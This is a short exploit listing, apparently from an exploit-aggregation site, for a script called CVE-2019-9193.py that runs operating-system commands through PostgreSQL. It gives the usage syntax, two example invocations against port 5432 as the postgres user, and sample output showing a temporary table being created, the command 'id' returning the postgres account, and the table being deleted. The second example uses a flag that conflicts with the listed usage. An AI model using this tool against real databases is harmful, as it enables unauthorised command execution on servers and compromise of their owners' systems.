Share
## https://sploitus.com/exploit?id=5E6A82E9-541D-53C8-BC7D-039F6E81D135
usage: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]

example: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'

example 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'

output:

[+] Connecting to PostgreSQL Database on 127.0.0.1:5432
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 9.3 is likely vulnerable
[+] Creating table _30e173ba7fa5577a86b9e9ecfea13360
[+] Command executed

uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)

[+] Deleting table _30e173ba7fa5577a86b9e9ecfea13360